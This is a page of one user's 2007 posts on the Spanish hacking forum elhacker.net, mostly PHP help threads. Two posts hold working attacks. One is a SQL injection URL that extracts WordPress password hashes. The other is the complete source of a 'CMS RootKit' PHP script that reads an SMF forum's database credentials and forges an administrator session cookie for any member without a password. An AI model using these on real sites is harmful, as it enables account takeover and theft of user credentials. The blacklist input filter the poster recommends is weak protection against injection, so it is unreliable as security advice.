elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 ... 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 [432] 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 ... 456
4311  Programación / PHP / Re: Include que no incluye en: 20 Diciembre 2007, 00:08 am
Yo te recomiendo que cambies de servidor XDDDD
4312  Programación / PHP / Re: Include que no incluye en: 18 Diciembre 2007, 19:51 pm
Si hay otra forma y es con sockets, fget pides el sitio con una petición GET y lo imprimes en pantalla, si tiene sockets desactivado intenta usar system() y te bajas el sitio con wget y lo vas actualizando con wget sitio -O out||cat out||mv out, si tienes system deshabilitado, no puedes usar socket y no puedes hacer includes o requiere entonces usa un script <?php phpinfo(); ?> para verificar que puedes hacer y que no.
4313  Programación / PHP / Re: ¿Mejor manera de restringir acceso? en: 18 Diciembre 2007, 08:57 am
Juaz, y no quieres una taza de café también?,

Tu código es muy básico como para ejemplificar una situación, son muchas las variables y conbinaciones posibles, todo depende el sistema y como esté comprometido ese código dentro del sistema, además solo diste ejemplos, nada concreto donde uno pueda deducir por donde podría fallar.

Yo podría dar ejemplo:
if (!file_exist($ruta)) { NO; } else { OK; }

Ahora yo podría definir OK y NO con funciones declaradas con anterioridad pero en ese ejemplo yo podría decir que no tiene RFI pero si una denegación de servicio si hago un include al propio index, es mas, no es RFI pero si LFI... ahora si mas arriba hubiera filtrado $ruta entonces ya no sería vulnerable, además si todo eso hubiera cambiado dependiendo en que lugar del sistema se encuentre.

En simples palabras tu código es muy pobre como para deducir fallas. Expresate mejor si quieres ejemplos concretos.
4314  Programación / PHP / Re: Include que no incluye en: 18 Diciembre 2007, 08:48 am
Fijate en la configuración del apache si tienes habilitado los includes:
Citar
URL file-access

Debería estar en ON

De todas formas debe ser tu servidor porque a mi me funcionó bién.
4315  Seguridad Informática / Nivel Web / SQL inyeccion en todas las versiones de wordpress menos la ultima :p en: 16 Diciembre 2007, 05:44 am
Una vulnerabilidad de tipo Inyección SQL fue encontrada en wordpress sobre las versiones 2.3 y posteriores.

Localmente hice pruebas y la version 2.3.1 no es afectada, de todas formas es recomendable utilizar sistemas de protección adicionales como PHPIDS o filtros que impidan un query con inyecciones SQL.

Ejemplo:

    http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/  UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/    FROM/**/wp_users%23

Esto también puede complementarse con una noticia posterior donde puedes tener acceso como administrador con tan solo tener acceso de lectura a la base de datos:
http://whk.h4ck1ng.net/2007-11.20/vulnerabilidad-en-la-autentificacion-de-cookies-dentro-de-wordpress/

Fuentes:
http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt
http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt
http://whk.h4ck1ng.net/2007-11.20/vulnerabilidad-en-la-autentificacion-de-cookies-dentro-de-wordpress/
http://seclists.org/bugtraq/2007/Dec/0127.html
http://trac.wordpress.org/ticket/2394
http://seclists.org/bugtraq/2007/Nov/0274.html
http://h4ck1ng.net/index.php/topic,1036.0.html
http://whk.h4ck1ng.net/2007-12.15/inyeccion-sql-en-wordpress-23-y-posteriores/

También está el pwnpress que hace todo el trabajo sucio automaticamente :P


http://www.info-pull.com/code.dynp
4316  Programación / PHP / Fork en php en: 8 Diciembre 2007, 09:26 am
Hola, estaba tratando de crear un port scanning en php pero de mucha velocidad donde se creara un proceso por cada 100 puertos para que fuera algo muy rápido pero me encontré con la sorpresa que no existe fork en php y me arrojó un error al ejecutarlo :-/

Busqué en php.net y encontré la función proc_open() que talvés pueda simular una función fork ejecutando /usr/local/bin/php para poder crear una función legitima fork(), me pueden dar una mano? :P

Por ejemplo:

Código
  1. $puerto = 1;
  2. while ($puerto <= 1000) {
  3. if(!@fsockopen($host, $puerto, $errno, $errstr, 30)) {
  4.  echo "$puerto cerrado<br />\n";
  5. } else {
  6.  echo "$puerto abierto<br />\n";
  7. }
  8. $puerto++;
  9. }

Hacerlo tardaría muchisimo pero con fork sería una solución
Código
  1. function escanear($host, $puerto_desde, $puerto_hasta){
  2. while ($puerto_desde <= $puerto_hasta) {
  3.  if(!@fsockopen($host, $puerto_desde, $errno, $errstr, 30)) {
  4.   echo "$host:$puerto_desde cerrado<br />\n";
  5.  } else {
  6.   echo "$host:$puerto_desde abierto<br />\n";
  7.  }
  8.  $puerto_desde++;
  9. }
  10. }
  11.  
  12. escanear("127.0.0.1", "1", "1000");
  13. escanear("192.168.1.69", "1", "1000");
  14. escanear("200.200.200.200", "1", "1000");
  15. escanear("10.10.10.10", "1", "1000");
  16. escanear("216.93.175.75", "1", "1000");
  17. etc....

Imagina todo esto en diferentes procesos, uno por cada escaneo.
4317  Programación / PHP / Re: UPDATE mySQL en PHP en: 8 Diciembre 2007, 03:57 am
Código
  1. <?
  2.        //Para evitar hacer esta invocacion de variables de conexion cada rato necesitas
  3.        //hacerte un php con cualquier nombre donde pongas estas variables y luego lo llamas con un include.
  4.        //Inicializamos variables de conexión
  5.  
  6.        $host="localhost";
  7. $user="tu usuario";
  8. $passwd="tu password";
  9. $db="tu base de datos";
  10.  
  11.        //Aqui recibimos las variables a actualizar
  12.  
  13.       $id=$_POST['h'];
  14.       $valor1=$_POST['valor1'];
  15.       $valor2=$_POST['valor2'];
  16.  
  17.        //Creamos la conexión
  18.  
  19.        $link = mysql_connect($host, $user, $passwd);
  20. mysql_select_db($db, $link);
  21.  
  22.        //aqui preguntamos si hicieron click en el boton actualizar
  23.        if($_POST['ir']=="Actualizar")
  24.       {
  25.              $sql=mysql_query("update [/tabla] set valor1='$valor1', valor2='$valor2' where [/id_de_tabla]='$id'",$link);
  26.              echo "Actualizado correctamente";
  27.        }
  28.       else
  29.       {
  30.            header("Location: nombre_php_anterior.php");
  31.        }
  32. ?>

Puedes modificarlo por lo siguiente:

Código
  1. <?
  2. //Para evitar hacer esta invocacion de variables de conexion cada rato necesitas
  3. //hacerte un php con cualquier nombre donde pongas estas variables y luego lo llamas con un include si es que existe con if exist para evitar errores.
  4.  
  5.        $referer = htmlspecialchars($_SERVER['HTTP_REFERER']);
  6.        //Inicializamos variables de conexión
  7.        $host="localhost";
  8. $user="tu usuario";
  9. $passwd="tu password";
  10. $db="tu base de datos";
  11.  
  12.        //Aqui recibimos las variables a actualizar
  13.  
  14.       $id = filtro($_POST['h']);
  15.       $valor1 = filtro($_POST['valor1']);
  16.       $valor2 = filtro($_POST['valor2']);
  17.  
  18.  
  19. function filtro($input){
  20. $referer = htmlspecialchars($_SERVER['HTTP_REFERER']);
  21. $filtro = array("`", "´", '"', "<", ">", ";", "'", "%60", "%C2%B4", "%22", "%3E", "%3C","%27", "%25", "%");
  22. for ($i=0; $i < count($filtro) ; $i++) {
  23.  if(eregi($filtro[$i],$input)) {
  24. echo "<center>Error.<br /><br />
  25. <a href=\"$referer\">Buelva a intentarlo por favor</a>.</center>\n";
  26.   exit(1);
  27.  }
  28. }
  29. return mysql_escape_string(htmlspecialchars($input, ENT_QUOTES));
  30. }
  31.  
  32. //Creamos la conexión
  33.  
  34. $link = mysql_connect($host, $user, $passwd);
  35. mysql_select_db($db, $link);
  36.  
  37. //aqui preguntamos si hicieron click en el boton actualizar
  38. if($_POST['ir']=="Actualizar")
  39. {
  40. $sql=mysql_query("update [/tabla] set valor1='$valor1', valor2='$valor2' where [/id_de_tabla]='$id'",$link);
  41. echo "Actualizado correctamente";
  42. } else { header("Location: nombre_php_anterior.php"); }
  43.  
  44. ?>

Solo le añadí un pequeño filtro para que no le hechen por la borda el trabajo con una inyección sql.
4318  Programación / PHP / Re: error al abrir un archivo php en: 8 Diciembre 2007, 03:43 am
Eso es porque tu apache no está reconociendo php.
ejecutas en tu consola...
sudo apt-get update
sudo apt-get install mysql-server
sudo /usr/bin/mysqladmin -u root password 123456 (esto significa que tu sql tendra como user "root" y password "123456")
sudo apt-get install apache2
sudo apt-get install php5
sudo apt-get install libapache2-mod-auth-mysql
sudo apt-get install php5-gd
sudo apt-get install php5-mysql
sudo apt-get install phpmyadmin
sudo /etc/init.d/mysql restart
sudo /etc/init.d/apache restart

Con todo eso tendrás apache+mysql+phpmyadmin+php5

Las configuraciones de cada uno están en
/etc/apache/httpd.conf
/etc/phpmyadmin/apache.conf
/etc/php5/apache2/php.ini
/etc/mysql/my.cnf
Los abres por ejemplo sudo gedit archivo.

Inicias con:
/etc/init.d/apache2 start
/etc/init.d/mysql start

Detienes con:
/etc/init.d/apache2 stop
/etc/init.d/mysql stop

Por defecto se instalará como servicio asi que no hace falta arrancar a menos que detengas los servicios en caso de que utilizes tu servidor esporádicamente, si es así entonces lo deshabilitas desde rcconf si no lo tienes lo instalas con sudo apt-get install rcconf.
4319  Programación / PHP / CMS RootKit by WHK en: 8 Diciembre 2007, 02:00 am
Hola, estoy creando un sistema en PHP que se basa en la administración de sistemas CMS, la idea es poder aprender de cada uno... smf, wordpress, etc.

Por ejemplo con tan solo visualizarlo en un directorio de smf podras iniciar seción como cualquier usuario sin la necesidad del password entendiendo la estructura de la cookie, tambien quiero hacerlo para wordpress entre otras cosas mas.

Hice la pagina pero quiero subirla como pagina demostrativa en http://lab.jccharry.com/ pero para eso necesito verificar bien que no tenga alguna vulnerabilidad como por ejemplo alguna inyección sql ya que se basa en consultas a la base de datos. De todas formas lo haré en una cuenta aparte sin derechos de sobreescribir nada ni de leer otras bases de datos pero prefiero evitar antes que lamentar.

Código
  1. <?php
  2.  
  3. #################################################
  4. # Archivo : rk.php #
  5. # Nombre : CMS RootKit #
  6. # Version : 2.3 Beta     #
  7. # Autor   : WHK         #
  8. # Sistemas CMS soportados : SMF 1.1.4 #
  9. #################################################
  10.  
  11. // Declaraciones, variables y constantes ============================================
  12. $rk_path_smf = "./Settings.php";
  13. $rk_path_wordpress = "./wp-config.php";
  14. $rk_cms = rk_filtro($_GET["CMS"]);
  15. $rk_id = rk_filtro($_GET["id"]);
  16. // $rk_tipo_user = rk_filtro($_GET["tipo_user"]);
  17. $rk_username = rk_filtro($_GET["username"]);
  18. $rk_cookiename = urlencode($_GET["cookiename"]);
  19. $rk_id_MEMBER = rk_filtro($_GET["ID_MEMBER"]);
  20. $rk_id_GROUP = rk_filtro($_GET["ID_GROUP"]);
  21. $rk_passwd = rk_filtro($_GET["passwd"]);
  22. $rk_passwordSalt = rk_filtro($_GET["passwordSalt"]);
  23. $rk_header = "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">
  24. <html>
  25. <head>
  26. <title>CMS RootKit by WHK</title>
  27. </head>
  28. <body style=\"color: rgb(255, 255, 255); background-color: rgb(102, 0, 0);\" alink=\"white\" link=\"white\" vlink=\"white\">\n<div style=\"text-align: center;\">
  29. <big>
  30. <span style=\"font-weight: bold;\"><a href=\"?\">CMS RootKit by WHK</a></span>
  31. </big><br />
  32. </div><br /><br />
  33. <table style=\"text-align: center; width: 100%; font-weight: bold;\" border=\"0\">
  34. <tbody>
  35. <tr>
  36. <td>Herramientas</td>
  37. </tr>
  38. </tbody>
  39. </table>
  40. <table style=\"text-align: center; width: 100%;\" border=\"1\" cellpadding=\"0\" cellspacing=\"0\">
  41. <tbody>
  42. <tr>
  43. <td><a href=\"?CMS=crear\">Crear cookie</a></td>
  44. </tr>
  45. </tbody>
  46. </table>
  47. <br /><br />";
  48. $rk_footer = "</body>
  49. </html>";
  50. $rk_consola_a = "<span style=\"font-style: italic; font-weight: bold;\">Debugger</span><br />
  51. <table style=\"text-align: left; width: 100%; color: rgb(51, 255, 51);\" border=\"2\" cellpadding=\"0\" cellspacing=\"0\">
  52. <tbody>
  53. <tr>
  54. <td style=\"background-color: rgb(0, 0, 0);\">\n";
  55. $rk_consola_b = "</td>
  56. </tr>
  57. </tbody>
  58. </table>\n";
  59. $rk_contenido_1 = "<br /><br />
  60. <span style=\"font-weight: bold;\"> Haz click sobre el sistema CMS que deseas administrar.</span>\n";
  61. $rk_contenido_2 = "<span style=\"font-weight: bold;\">Ingrese el nombre de usuario registrado para iniciar seci&oacute;n, o si
  62. lo prefieres puedes ingresar &uacute;nicamente el numero de usuario registrado.
  63. (No se requiere password).<br /><br />
  64. </span>
  65. <form method=\"get\">
  66. <input name=\"CMS\" value=\"SMF\" type=\"hidden\">
  67. <table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
  68. <tbody>
  69. <tr>
  70. <td>Username:&nbsp;</td>
  71. <td><input name=\"username\" type=\"text\"></td>
  72. <td><input value=\"Ingresar\" type=\"submit\"></td>
  73. </tr>
  74. </form>
  75. <form method=\"get\">
  76. <input name=\"CMS\" value=\"SMF\" type=\"hidden\">
  77. <tr>
  78. <td>Id N&ordm;:&nbsp;</td>
  79. <td><input name=\"id\" type=\"text\"></td>
  80. <td><input value=\"Ingresar\" type=\"submit\"></td>
  81. </tr>
  82. </tbody>
  83. </table>
  84. </form>\n";
  85. $rk_error_1 = "Falta cookiename";
  86. $rk_error_2 = "Falta ID_MEMBER";
  87. $rk_error_3 = "Falta passwd";
  88. $rk_error_4 = "Falta passwordSalt";
  89. $rk_error_5 = "Falta ID_GROUP";
  90. $rk_comando_0 = "root@system:~$ <br />\n";
  91. $rk_comando_1 = "root@system:~$ rk&nbsp;-cms verificar<br />\n";
  92. $rk_comando_2 = "root@system:~$ rk&nbsp;-cms $rk_cms<br />\n";
  93. $rk_comando_3 = "root@system:~$ rk&nbsp;-cms $rk_cms -username $rk_username<br />\n";
  94. $rk_comando_4 = "root@system:~$ rk&nbsp;-cms $rk_cms -cookiename $rk_cookiename -ID_MEMBER $rk_id_MEMBER -passwd *** -passwordSalt $rk_passwordSalt<br />\n";
  95. // ==================================================================================
  96.  
  97. // Funciónes ========================================================================
  98. // Filtro ---------------------------------------------------------------------------
  99. function rk_filtro($rk_input){
  100. $rk_referer = htmlspecialchars($_SERVER['HTTP_REFERER']);
  101. $rk_filtro = array("`", "´", '"', "<", ">", ";", "'", "%60", "%C2%B4", "%22", "%3E", "%3C","%27", "%25", "%");
  102. for ($rk_i=0; $rk_i < count($rk_filtro) ; $rk_i++) {
  103.  if(eregi($rk_filtro[$rk_i],$rk_input)) {
  104. echo "<center>Por razones de seguridad no puede mostrarse la p&aacute;gina debido a que has ingresado<br />
  105. uno o mas caracteres prohibidos (".htmlspecialchars($rk_filtro[$rk_i]).") dentro de alg&uacute;n campo.<br /><br />
  106. <a href=\"$rk_referer\">Buelva a intentarlo por favor</a>.</center>\n";
  107.   exit(1);
  108.  }
  109. }
  110. return mysql_escape_string(htmlspecialchars($rk_input, ENT_QUOTES));
  111. }
  112. // ----------------------------------------------------------------------------------
  113.  
  114. // Verificación de sistemas CMS -----------------------------------------------------
  115. function rk_verificar($rk_vcms, $rk_path){
  116. if (file_exists($rk_path)) {
  117.  rk_consola("Se ha detectado un sistema <a style=\"color: rgb(51, 255, 51);\" href=\"?CMS=$rk_vcms\">$rk_vcms</a> en este directorio.");
  118.  return false;
  119. } else {
  120.  return true;
  121. }
  122. }
  123. // ----------------------------------------------------------------------------------
  124.  
  125. // Mensaje de error -----------------------------------------------------------------
  126. function rk_error($rk_ferror){
  127. echo "<font style='color: red'>[!] $rk_ferror</font><br />\n";
  128. return true;
  129. }
  130. // ----------------------------------------------------------------------------------
  131.  
  132. // Mensaje rojo ---------------------------------------------------------------------
  133. function rk_msg_rojo($rk_fcolor){
  134. echo "<span style=\"font-weight: bold; color: rgb(204, 0, 0);\">$rk_fcolor</span>";
  135. }
  136. // ----------------------------------------------------------------------------------
  137.  
  138. // Mensaje verde --------------------------------------------------------------------
  139. function rk_msg_verde($rk_fcolor){
  140. echo "<span style=\"font-weight: bold; color: rgb(0, 153, 0);\">$rk_fcolor</span>";
  141. }
  142. // ----------------------------------------------------------------------------------
  143.  
  144. // Mensaje multicolor ---------------------------------------------------------------
  145. function rk_msg_multicolor($rk_fcolor, $verificar){
  146. if($verificar == "1"){
  147.  rk_msg_rojo($rk_fcolor);
  148. } else {
  149.  rk_msg_verde($rk_fcolor);
  150. }
  151. }
  152. // ----------------------------------------------------------------------------------
  153.  
  154. // Mensaje de consola ---------------------------------------------------------------
  155. function rk_consola($rk_fconsola){
  156. echo "[*] $rk_fconsola<br />\n";
  157. }
  158. // ----------------------------------------------------------------------------------
  159. // ==================================================================================
  160.  
  161. // Inicio ===========================================================================
  162. if($rk_cms == ""){
  163. echo $rk_header;
  164. echo $rk_consola_a;
  165. echo $rk_comando_1;
  166. rk_consola("Verificando sistemas CMS ...");
  167.  
  168. // Verificando sistemas CMS... -----------------------------------------------------
  169. if (!rk_verificar("SMF", $rk_path_smf)) {
  170.  $rk_b = "1";
  171. }
  172.  
  173. if (!rk_verificar("Wordpress", $rk_path_wordpress)) {
  174.  $rk_b = "1";
  175. }
  176. // ----------------------------------------------------------------------------------
  177.  
  178. if ($rk_b != "1") {
  179.  rk_error("No se ha detectado ning&uacute;n sistema CMS.<br />\n");
  180.  echo "<br />$rk_comando_0\n";
  181.  echo $rk_consola_b;
  182.  echo $rk_footer;
  183.  exit(1);
  184. } else {
  185.  echo "<br />$rk_comando_0\n";
  186.  echo $rk_consola_b;
  187.  echo $rk_contenido_1;
  188.  echo $rk_footer;
  189.  exit(0);
  190. }
  191. }
  192. // ==================================================================================
  193.  
  194. // Crear cookie =====================================================================
  195. $rk_e = "1";
  196. if($rk_cms == "crear") {
  197. if ($rk_cookiename == "") { $rk_f1 = "1"  ; $rk_e++ ; }
  198. if ($rk_id_MEMBER == "") { $rk_f2 = "1"  ; $rk_e++ ; }
  199. if ($rk_passwd == "") { $rk_f3 = "1"  ; $rk_e++ ; }
  200. if ($rk_passwordSalt == "") { $rk_f4 = "1"  ; $rk_e++ ; }
  201. if ($rk_id_GROUP == "") { $rk_f5 = "1"  ; $rk_e++ ; }
  202. if ($rk_e == "6") {
  203. echo $rk_header;
  204. echo "<span style=\"font-weight: bold; text-decoration: underline;\">SMF</span>
  205. <form method=\"get\">
  206. <table style=\"text-align: left; width: 100%;\" border=\"1\"
  207. cellpadding=\"1\" cellspacing=\"0\">
  208.  <tbody>
  209.    <tr>
  210.      <td>
  211.      <input name=\"CMS\" value=\"crear\" type=\"hidden\">
  212.      <table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
  213.        <tbody>
  214.          <tr>
  215.            <td>cookiename:&nbsp;</td>
  216.            <td><input name=\"cookiename\" type=\"text\"></td>
  217.          </tr>
  218.          <tr>
  219.            <td>ID_MEMBER:&nbsp;</td>
  220.            <td><input name=\"ID_MEMBER\" type=\"text\"></td>
  221.          </tr>
  222.          <tr>
  223.            <td>Passwd (HASH):&nbsp;</td>
  224.            <td><input name=\"passwd\" type=\"text\"></td>
  225.          </tr>
  226.          <tr>
  227.            <td>passwordSalt:&nbsp;</td>
  228.            <td><input name=\"passwordSalt\" type=\"text\"></td>
  229.          </tr>
  230.          <tr>
  231.            <td>ID_GROUP:&nbsp;</td>
  232.            <td><input name=\"ID_GROUP\" type=\"text\"></td>
  233.            <td><input value=\"Generar cookie\" type=\"submit\"></td>
  234.          </tr>
  235.        </tbody>
  236.      </table>
  237.      </td>
  238.    </tr>
  239.  </tbody>
  240. </table>
  241. </form>
  242. <br />
  243. Ingresa los siguientes datos para generar tu cookie.";
  244. echo $rk_footer;
  245. } else {
  246. if ($rk_e  >= "2") {
  247. echo "$rk_header $rk_consola_a $rk_comando_4";
  248. if ($rk_f1 == "1") { rk_error("$rk_error_1"); }
  249. if ($rk_f2 == "1") { rk_error("$rk_error_2"); }
  250. if ($rk_f3 == "1") { rk_error("$rk_error_3"); }
  251. if ($rk_f4 == "1") { rk_error("$rk_error_4"); }
  252. if ($rk_f5 == "1") { rk_error("$rk_error_5"); }
  253. echo "<br />$rk_comando_0\n$rk_consola_b ";
  254. echo "<br /><span style=\"font-weight: bold; text-decoration: underline;\">SMF</span>
  255. <form method=\"get\">
  256. <table style=\"text-align: left; width: 100%;\" border=\"1\"
  257. cellpadding=\"1\" cellspacing=\"0\">
  258.  <tbody>
  259.    <tr>
  260.      <td>
  261.      <input name=\"CMS\" value=\"crear\" type=\"hidden\">
  262.      <table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
  263.        <tbody>
  264.          <tr>
  265.            <td>";rk_msg_multicolor("cookiename:", $rk_f1);echo"&nbsp;</td>
  266.            <td><input name=\"cookiename\" type=\"text\" value=\"$rk_cookiename\"></td>
  267.          </tr>
  268.          <tr>
  269.            <td>";rk_msg_multicolor("ID_MEMBER:", $rk_f2);echo"&nbsp;</td>
  270.            <td><input name=\"ID_MEMBER\" type=\"text\" value=\"$rk_id_MEMBER\"></td>
  271.          </tr>
  272.          <tr>
  273.            <td>";rk_msg_multicolor("Passwd (HASH):", $rk_f3);echo"&nbsp;</td>
  274.            <td><input name=\"passwd\" type=\"text\" value=\"$rk_passwd\"></td>
  275.          </tr>
  276.          <tr>
  277.            <td>";rk_msg_multicolor("passwordSalt:", $rk_f4);echo"&nbsp;</td>
  278.            <td><input name=\"passwordSalt\" type=\"text\" value=\"$rk_passwordSalt\"></td>
  279.          </tr>
  280.          <tr>
  281.            <td>";rk_msg_multicolor("ID_GROUP:", $rk_f5);echo"&nbsp;</td>
  282.            <td><input name=\"ID_GROUP\" type=\"text\" value=\"$rk_id_GROUP\"></td>
  283.            <td><input value=\"Generar cookie\" type=\"submit\"></td>
  284.          </tr>
  285.        </tbody>
  286.      </table>
  287.      </td>
  288.    </tr>
  289.  </tbody>
  290. </table>
  291. </form>
  292. <br />
  293. Ingresa los siguientes datos para generar tu cookie.";
  294. echo $rk_footer;
  295. }
  296.  
  297. if ($rk_e == "1") {
  298. echo $rk_header;
  299. echo $rk_consola_a;
  300. echo $rk_comando_4;
  301. if($rk_id_GROUP == "1") {
  302.  // Administrador
  303.  rk_consola("Construyendo cookie...");
  304.  rk_consola("Datos:");
  305.  echo "<font style='color: red'>\n[!] cookiename: $rk_cookiename<br />\n";
  306.  echo "[!] ID_MEMBER: $rk_id_MEMBER<br />\n";
  307.  echo "[!] passwd (hash): $rk_passwd<br />\n";
  308.  echo "[!] passwordSalt: $rk_passwordSalt</font><br />\n";
  309.  rk_consola("Cookie : $rk_cookiename=".urlencode("a:4:{i:0;s:1:\"$rk_id_MEMBER\";i:1;s:40:\"".sha1($rk_passwd.$rk_passwordSalt)."\";i:2;i:1196740416;i:3;i:0;}"));
  310.  echo "<br />$rk_comando_0\n";
  311.  echo $rk_consola_b;
  312.  echo $rk_footer;
  313. }
  314. if($rk_id_GROUP == "0") {
  315.  // Usuario
  316.  rk_consola("Construyendo cookie...");
  317.  rk_consola("Datos:");
  318.  echo "<font style='color: red'>\n[!] cookiename: $rk_cookiename<br />\n";
  319.  echo "[!] ID_MEMBER: $rk_id_MEMBER<br />\n";
  320.  echo "[!] passwd (hash): $rk_passwd<br />\n";
  321.  echo "[!] passwordSalt: $rk_passwordSalt</font><br />\n";
  322.  rk_consola("Cookie : $rk_cookiename=".urlencode("a:4:{i:0;i:$rk_id_MEMBER;i:1;s:40:\"".sha1($rk_passwd.$rk_passwordSalt)."\";i:2;i:1196740416;i:3;i:0;}"));
  323.  echo "<br />$rk_comando_0\n";
  324.  echo $rk_consola_b;
  325.  echo $rk_footer;
  326. }
  327. }
  328. }
  329. }
  330. // ==================================================================================
  331.  
  332. // SMF ==============================================================================
  333. if($rk_cms == "SMF") {
  334. echo $rk_header;
  335. echo $rk_consola_a;
  336. if($rk_username != ""){
  337.  echo $rk_comando_3;
  338. } else {
  339.  echo $rk_comando_2;
  340. }
  341. // Verificando la existencia de SMF -------------------------------------------------
  342. rk_consola("Verificando sistema SMF...");
  343. if (file_exists($rk_path_smf)) {
  344.  define("SMF", 1);
  345.  include($rk_path_smf);
  346. rk_consola("Verifici&oacute;n satisfactoria.");
  347. } else {
  348.  rk_error("No existe el sistema CMS en este directorio.");
  349.  echo "<br />$rk_comando_0\n";
  350.  echo $rk_consola_b;
  351.  echo $rk_footer;
  352.  exit(1);
  353. }
  354.  
  355. // Definiendo conexión SQL ---------------------------------------------------------
  356. define (SERVER, $db_server);
  357. define (USER, $db_user);
  358. define (PASS, $db_passwd);
  359. define (DB,   $db_name);
  360. // ----------------------------------------------------------------------------------------
  361.  
  362. // Función de la consulta SQL -------------------------------------------------------
  363. function rk_db_query($rk_sql){
  364. if (!$rk_conectar = @mysql_pconnect(SERVER, USER, PASS)){
  365.  rk_error("Error en la conecci&oacute;n.");
  366.  return false;
  367. }
  368. if (!@mysql_select_db(DB,$rk_conectar) ){
  369.  rk_error("Error al seleccionar la base de datos.");
  370.  return false;
  371. }
  372. if (!$rk_query = @mysql_query($rk_sql,$rk_conectar) ){
  373.  rk_error("Error al efectuar la busqueda.");
  374.  return false;
  375. }
  376. return $rk_query;
  377. }
  378.  
  379. // Verificando ID_MEMBER y memberName ------------------------------------------------
  380. $rk_consulta2 = "SELECT ID_MEMBER FROM `".$db_prefix."members`";
  381. if ($rk_id != "") {
  382.  $rk_consulta = "SELECT * FROM `".$db_prefix."members` WHERE ID_MEMBER = $rk_id";
  383.  $c_ = "1";
  384. }
  385.  
  386. if ($c_ != "1") {
  387.  if ($rk_username != "") {
  388.   $rk_consulta = "SELECT * FROM `".$db_prefix."members` WHERE `memberName` LIKE CONVERT(_utf8 '$rk_username' USING latin1) COLLATE latin1_swedish_ci";
  389.  }
  390. }
  391.  
  392. // Buscando usuario ------------------------------------------------------------------
  393. rk_consola("Conectando...");
  394. if(($rk_username == "") and ($rk_id == "")){
  395.  if ($rk_query = rk_db_query($rk_consulta2)){
  396.   $rk_whk = "1";
  397.   while ($rk_row = mysql_fetch_row($rk_query)){
  398.    foreach ($rk_row as $rk_out)
  399.     $rk_whk++;
  400.   }
  401.   $rk_whk_out = $rk_whk - 1;
  402.   rk_consola("Conecci&oacute;n satisfactoria.");
  403.  }
  404.  rk_consola("Numero de usuarios registrados: $rk_whk_out");
  405.  echo "<br />$rk_comando_0\n";
  406.  echo $rk_consola_b;
  407.  echo $rk_contenido_2;
  408.  echo $rk_footer;
  409.  exit(0);
  410.  
  411. } else {
  412.  if ($rk_query = rk_db_query($rk_consulta)){
  413.   rk_consola("Conecci&oacute;n satisfactoria.");
  414.   if ($c_ == "1") {
  415.    rk_consola("Buscando usuario N&ordm;$rk_id ...");
  416.   } else {
  417.    rk_consola("Buscando usuario $rk_username...");
  418.   }
  419.   $rk_whk = 1;
  420.   while ($rk_row = mysql_fetch_row($rk_query)){
  421.    foreach ($rk_row as $rk_out){
  422.     if ($rk_whk == "1" ){ $rk_idMEMBER_out = $rk_out; }
  423.     if ($rk_whk == "2" ){ $rk_usernameout = $rk_out; }
  424.     if ($rk_whk == "5" ){ $rk_idGROUP_out = $rk_out; }
  425.     if ($rk_whk == "14"){ $rk_passwd_out = $rk_out; }
  426.     if ($rk_whk == "52"){ $rk_passwordSalt_out = $rk_out; }
  427.     $rk_whk++;
  428.    }
  429.   }
  430.  }
  431. }
  432.  
  433. // Aplicando cookie ------------------------------------------------------------------
  434. if($rk_idGROUP_out == "1") {
  435.  // Administrador
  436.  rk_consola("Usuario encontrado. Construyendo cookie...");
  437.  rk_consola("Datos:");
  438.  echo "<font style='color: red'>\n[!] cookiename: $cookiename<br />\n";
  439.  echo "[!] Username: $rk_usernameout<br />\n";
  440.  echo "[!] ID_MEMBER: $rk_idMEMBER_out<br />\n";
  441.  echo "[!] passwd (hash): $rk_passwd_out<br />\n";
  442.  echo "[!] passwordSalt: $rk_passwordSalt_out<br />\n";
  443.  echo "[!] ID_GROUP: $rk_idGROUP_out (Administrador)</font><br />\n";
  444.  echo "<script>void(document.cookie='$cookiename=".urlencode("a:4:{i:0;s:1:\"$rk_idMEMBER_out\";i:1;s:40:\"".sha1($rk_passwd_out.$rk_passwordSalt_out)."\";i:2;i:1196740416;i:3;i:0;}")."');</script>\n";
  445.  rk_consola("Cookie aplicada.");
  446. }
  447. if($rk_idGROUP_out == "0") {
  448.  // Usuario
  449.  rk_consola("Usuario encontrado. Construyendo cookie...");
  450.  rk_consola("Datos:");
  451.  echo "<font style='color: red'>\n[!] cookiename: $cookiename<br />\n";
  452.  echo "[!] Username: $rk_usernameout<br />\n";
  453.  echo "[!] ID_MEMBER: $rk_idMEMBER_out<br />\n";
  454.  echo "[!] passwd (hash): $rk_passwd_out<br />\n";
  455.  echo "[!] passwordSalt: $rk_passwordSalt_out<br />\n";
  456.  echo "[!] ID_GROUP: $rk_idGROUP_out (Usuario)</font><br />\n";
  457.  echo "<script>void(document.cookie='$cookiename=".urlencode("a:4:{i:0;i:$rk_idMEMBER_out;i:1;s:40:\"".sha1($rk_passwd_out.$rk_passwordSalt_out)."\";i:2;i:1196740416;i:3;i:0;}")."');</script>\n";
  458.  rk_consola("Cookie aplicada.");
  459. }
  460. if($rk_idGROUP_out == "") {
  461.  // Ninguno
  462.  rk_error("Usuario inexistente.<br />\n");
  463. }
  464. echo "<br />$rk_comando_0\n";
  465. echo $rk_consola_b;
  466. echo $rk_contenido_2;
  467. echo $rk_footer;
  468. }
  469. // ----------------------------------------------------------------------------------
  470. // ==================================================================================
  471.  
  472. // Wordpress ========================================================================
  473. if($rk_cms == "Wordpress") {
  474. echo $rk_header;
  475. echo $rk_consola_a;
  476. echo $rk_comando_2;
  477. rk_error("En construcci&oacute;n.");
  478. echo "<br />$rk_comando_0\n";
  479. echo $rk_consola_b;
  480. echo $rk_footer;
  481. }
  482. // ==================================================================================
  483.  
  484. ?>


